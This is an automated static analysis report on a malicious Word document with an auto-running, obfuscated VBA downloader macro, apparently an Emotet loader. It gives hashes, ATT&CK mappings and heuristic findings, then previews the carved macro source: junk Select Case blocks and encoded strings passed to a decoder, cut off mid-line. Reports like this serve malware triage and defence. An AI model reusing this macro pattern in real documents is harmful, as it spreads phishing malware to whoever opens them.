Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1ca92b5e83f35c42…

MALICIOUS

Office (OLE)

Size: 223.0 KB
Created: 2018-04-04 22:57:00
Authoring application: Microsoft Office Word
First seen: 2018-04-12
MD5: 84fcf866f98dec046ad9b69bef41c4af
SHA-1: cb5a72f18b6989a4a8cc8fc8cb037e896bbed86c
SHA-256: 1ca92b5e83f35c422df3f7e41223746d07c5ac9dd38555f449e1df01f61156a2
Risk score: 224

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen procedure, so the macro is designed to run automatically when the document is opened. The macro calls CreateObject and is obfuscated (string-decoding calls interleaved with junk Select Case blocks), which is consistent with a downloader that retrieves and executes a second-stage payload. The ClamAV signature match further confirms that the file is malicious.

Heuristics (8)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected (severity: medium; 3 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    The VBA project defines an AutoOpen procedure, which Word runs automatically when the document is opened.
  • CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ)
    The macro calls CreateObject, which instantiates COM objects at runtime.
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (severity: info; rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 45443 bytes
SHA-256: d61007f03fdebe38d8a535b429604310cb54be9d569c6f1aa11f18b4ba82b569
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "KzDGmMTGzwXQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "jwwkZFiWOotXWO"
Function VtNHXaSRw()
On Error Resume Next
Select Case WNTvb
         Case 51069
            DGMjzQ = 51354
            pIIfUV = Sqr(96297)
         Case 18773
            iQjkAq = CSng(RzaIJk)
            ZUJqa = IHwsDi
End Select
hjScSB = zZNIR("R.1zXiIfneUtzaS8dTV6sxc9e9dDxfQZ17KP69wF5qrqM+U5cUN9L6k3NYwPnaObhYPk1cZ6e37cc9f7kRF1OP+vIy1FvqO++e3+RSh+O1JvEiR1VlpY", 3, 108)
Select Case NOsjYD
         Case 73042
            KrLCP = 68153
            ApSmE = Sqr(14465)
         Case 66450
            KfYiZ = CSng(UqhSLO)
            GrjGw = OcznKr
End Select
Select Case zvTRv
         Case 12183
            pHTwHD = 48315
            QjYhEa = Sqr(93128)
         Case 13042
            kvsGG = CSng(mXswro)
            mQNaX = KhKZLf
End Select
NPjtfG = zZNIR("C238yR5GPHdc57ivLl1c/84ii9S6YqDdGAmHYr3GFFnxXmG7x9q6kjqWsSr9sxzzpmF3ls51UUn/d8pL7vz3Ko84fux7n1/fMeD0Et//+Hir8/fmz+Ll7u39qfb4nP3Ury+3VRNeXHx09f740V6lS/S5SLNV4vrNPx1tUgvrxar8Gb0c.", 3, 171)
Select Case jMdPlD
         Case 78368
            hAOnj = 34186
            bOFhtL = Sqr(94403)
         Case 16107
            iCRwZ = CSng(VhaaI)
            tdNnzs = PznnN
End Select
Select Case kztNsm
         Case 26788
            GCPjzv = 91400
            bUvFh = Sqr(20266)
         Case 90788
            LSjmSK = CSng(CcUlaR)
            qGmwE = ijjiXL
End Select
URLGkEkG = zZNIR("w2/fP//z88y9vN2/t7d3LYzN8++Pu+4eLsOe3u6ouPla/vRUv7e+vtmeHPS+v3PN6/7m7KV7fXqpmuPu+vn27+fC3Dz9cXS6vs1/TNL28Wub/S5ZZvkzz/6aXySr5tsqXq3pYf3Jl4vppnbiycPd+vXabnav9unDlzn2d1l/dl86euftH77.UBmXa", 3, 177)
Select Case IczCa
         Case 4340
            BZFbcw = 25996
            HiKUB = Sqr(25727)
         Case 57303
            SkFISc = CSng(COHJja)
            SLYVMR = LUIYR
End Select
Select Case iMIRnO
         Case 72187
            JQcrVC = 73271
            ESkjo = Sqr(49978)
         Case 96177
            VQNPc = CSng(bELjTf)
            prXjG = lvRFV
End Select
ErkbiO = zZNIR("wV1GfcHO2vg2RMfqy/kC+p5VH2lqPtprvsR+5AfqCfUebDrQH/Nn53F50l1kDOf433KR8QJ+1N79ma3nQfegL056tBwYd48zPVo8QdvIZ+fke8T8761vCd+MS9O9mytPsyfgXW3tTxkHI883+xH3SfkLdYz91t9c/1WdjIfDIeIG+0Cf1m8lc/9wHyo53y0J3DekxctPwIj0vi", 3, 198)
Select Case GwGjw
         Case 19500
            OpwWA = 42413
            NpXjp = Sqr(68689)
         Case 11873
            PaNCi = CSng(MXDLr)
            VzUXPW = RVsVW
End Select
Select Case cwfvv
         Case 48080
            ZcXvi = 25252
            Tpcwzo = Sqr(84793)
         Case 87803
            PcSKh = CSng(lXuJVV)
            wbZXOF = mizpqS
End Select
IlWDSvjirU = zZNIR("@mzB4UuMIu4J7hd+DamV97xTsn7sSpEd6Ni3bZeeNcd+G8J8R7Yr1uFd8t6ll3VwG", 5, 57)
Select Case pfSORi
         Case 76990
            TdOUu = 83893
            BUrYbt = Sqr(2697)
         Case 44590
            amwVli = CSng(TOjvsb)
            DnEjHv = tLDmd
End Select
Select Case oXpTOh
         Case 73271
            bjDsa = 76323
            EwVTF = Sqr(89257)
         Case 25352
            IwWOC = CSng(iaSGYT)
            Njuzj = SAXPcA
End Select
JOqmUIvrNi = zZNIR("5RidkCFym86k7Yv572ku9Xs3xRB2TR3PpPfDi1kf+IW9FfYt+ZLw8qN4884Z9sledVOKTmnWCuJEiK7", 7, 70)
Select Case Qpwabh
         Case 52236
            hVsSj = 53210
            FklCUv = Sqr(81978)
         Case 30162
            UYPuCl = CSng(tNWRpb)
            irrojO = jwCWv
End Select
Select Case ilRlY
         Case 49052
            MsUJp = 10054
            EdKarE = Sqr(40162)
         Case 2422
            CMovY = CSng(IYWro)
            dmrrwd = ikwUr
End Select
MkwfwIM = zZNIR("4jINr3yBbwwGn79JHs987+BPZXZeeKTeGwdn73VF+wzfvSKS886Nr8ceaf29I88FfO1OvPiZPs7rXfy0/KVcSd/hc+oR8T9qHitDK/toPr0rPvaE3/wwAZ1Cb4E71u+K1+Z5zEf6vc8n6ivJMLtQTgnWGd1txE/c9+J9cx8
... (truncated)